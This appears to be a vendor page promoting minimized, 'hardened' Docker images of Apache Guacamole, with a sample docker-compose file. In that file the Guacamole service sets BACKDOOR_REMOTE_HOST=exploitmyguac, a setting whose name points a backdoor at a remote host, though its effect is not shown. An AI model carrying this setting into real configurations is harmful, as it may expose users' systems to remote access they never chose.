In the software development world, optimizing applications for efficiency and security is a main...
Hardened and Minimized Application Powered By Apache Guacamole
Part 1: What is Apache Guacamole?
Apache Guacamole is an open-source clientless remote desktop gateway that allows users to access remote machines and applications through a web browser without the need for additional plugins or software installations.
Part 2: What Rampart™ did to Harden and Minimize the Application?
Many Docker images are bloated and contain unnecessary attack surface. At Rampart AI™, we believe your images should contain only the minimal set of files necessary to fulfill their function. And nothing else.
We built hardened versions of Guacamole 1.5.3 and Guacd 1.5.3 base images using the Rampart™ Training Harness. The Rampart™ Harness interacted with Apache Guacamole using several SSH and RDP test cases, then the Harness removed all files within the images not necessary to support those connection types. The resulting images are significantly smaller (231.48 -> 99.61MB for Guacamole and 51.19 -> 18.8MB for Guacd) and have a correspondingly reduced attack surface.
Part 3: Here’s a sample docker-compose yml, to get the complete version reach out through the form below
NOTE: this example assumes you already have a working guacamole database in your guacamole_db volume.
See https://guacamole.apache.org/doc/gug/guacamole-docker.html for help setting up your guacamole database before attempting to use these minimized images.
version: '3.7'
###################################################################
# A simple example for testing guacamole
# Guac: main guacamole interface.
# Guacd: supporting container for guacamole
# DB: a Postgres database server
# SSH: an ssh helper 3 server
# RDP: an rdp helper server
#
#
# Demo host
# /==============================\
# | :8080 :9200 |
# :8087 | /------\ /-------\ |
# [user] ------->| Guac .--------->| Guacd | |
# | \.-.---/ \-------/ |
# | | | | :5432 |
# | | | | /----\ |
# | | | \---------->| DB | |
# | | | \----/ |
# | | | :22 |
# | | | /-----\ |
# | | \------------>| SSH | |
# | | \-----/ |
# | | :3389 |
# | | /-----\ |
# | \-------------->| RDP | |
# | \-----/ |
# | |
# \==============================/
#
######################################################################################
services:
sample-guacamole-service:
image: guacamole_guacamole_1.5.3.slim
environment:
- JAVA_TOOL_OPTIONS
- GUACD_HOSTNAME=sample-guacamole-daemon
- BACKDOOR_REMOTE_HOST=exploitmyguac
- POSTGRESQL_DATABASE=guacamole_db
- POSTGRESQL_HOSTNAME=sample-guacamole-db
- POSTGRESQL_PASSWORD='ChooseYourOwnPasswordHere1234'
- POSTGRESQL_USER=guacamole_user
ports:
- 8087:8080
links:
- sample-guacamole-daemon
# guacd
sample-guacamole-daemon:
image: guacamole_guacd_1.5.3.slim
restart: always
#NOTE: assumes you have already followed the setup instructions for the guacamole
# database (do this using the non-minimized guacamole image)
sample-guacamole-db:
environment:
- PGDATA=/var/lib/postgresql/data/guacamole
- POSTGRES_DB=guacamole_db
- POSTGRES_PASSWORD='ChooseYourOwnPasswordHere1234'
- POSTGRES_USER=guacamole_user
volumes:
- guacamole_db:/var/lib/postgresql/data
image: postgres:13.4
restart: always
sample-guacamole-sshbox:
image: mmumshad/ubuntu-ssh-enabled:latest
sample-guacamole-rdpbox:
image: scottyhardy/docker-remote-desktop:ubuntu-20.04
volumes:
guacamole_db:
driver: local
Part 4: Use This Minimized and Hardened Application
Provide your information below to access a minimized and hardened application powered by Apache Guacamole in our docker repository.
Note for configuring Apache Guacamole for first-time use: make sure Docker+ docker-compose is downloaded on your machine
